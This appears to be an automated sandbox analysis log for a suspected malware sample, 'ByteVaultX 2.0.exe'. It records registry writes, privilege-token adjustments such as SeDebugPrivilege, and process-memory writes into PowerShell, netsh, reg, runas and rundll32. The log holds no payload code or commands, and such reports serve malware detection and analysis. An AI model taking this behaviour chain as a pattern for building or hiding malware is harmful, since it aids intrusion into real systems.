Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\"" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 901e8d74fdaeda01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$http://www.typepad.com/ C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Explorer\Main\OperationalData = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\CIStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 578f425afdaeda01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage\ProcessingFlag = f0fbf56cfdaeda01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\History C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "395205405" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\NextUpdateDate = "423462179" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4972 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe
PID 4972 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe
PID 2212 wrote to memory of 4616 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2212 wrote to memory of 4616 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2212 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\SYSTEM32\netsh.exe
PID 2212 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\SYSTEM32\netsh.exe
PID 2212 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\SYSTEM32\runas.exe
PID 2212 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\SYSTEM32\runas.exe
PID 2212 wrote to memory of 4292 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\system32\cmd.exe
PID 2212 wrote to memory of 4292 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\system32\cmd.exe
PID 4292 wrote to memory of 2696 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4292 wrote to memory of 2696 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4292 wrote to memory of 1604 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4292 wrote to memory of 1604 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4292 wrote to memory of 1252 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4292 wrote to memory of 1252 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4292 wrote to memory of 1932 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4292 wrote to memory of 1932 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4292 wrote to memory of 1232 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4292 wrote to memory of 1232 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 224 wrote to memory of 796 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 224 wrote to memory of 796 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 224 wrote to memory of 796 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 224 wrote to memory of 796 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4292 wrote to memory of 1456 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4292 wrote to memory of 1456 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4292 wrote to memory of 4516 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4292 wrote to memory of 4516 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4292 wrote to memory of 3344 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4292 wrote to memory of 3344 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4292 wrote to memory of 4592 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4292 wrote to memory of 4592 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4292 wrote to memory of 3708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4292 wrote to memory of 3708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4292 wrote to memory of 2732 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4292 wrote to memory of 2732 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4292 wrote to memory of 4588 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4292 wrote to memory of 4588 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4292 wrote to memory of 5096 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4292 wrote to memory of 5096 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4292 wrote to memory of 4856 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4292 wrote to memory of 4856 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4292 wrote to memory of 668 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4292 wrote to memory of 668 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4292 wrote to memory of 4860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4292 wrote to memory of 4860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4292 wrote to memory of 3652 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4292 wrote to memory of 3652 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4292 wrote to memory of 2220 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4292 wrote to memory of 2220 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4292 wrote to memory of 4572 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4292 wrote to memory of 4572 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4292 wrote to memory of 1856 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4292 wrote to memory of 1856 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4292 wrote to memory of 932 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4292 wrote to memory of 932 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4292 wrote to memory of 2624 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4292 wrote to memory of 2624 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4292 wrote to memory of 4268 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4292 wrote to memory of 4268 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4292 wrote to memory of 416 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4292 wrote to memory of 416 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 416 wrote to memory of 1932 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\cmd.exe
PID 416 wrote to memory of 1932 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe

"C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"

C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe

"C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"

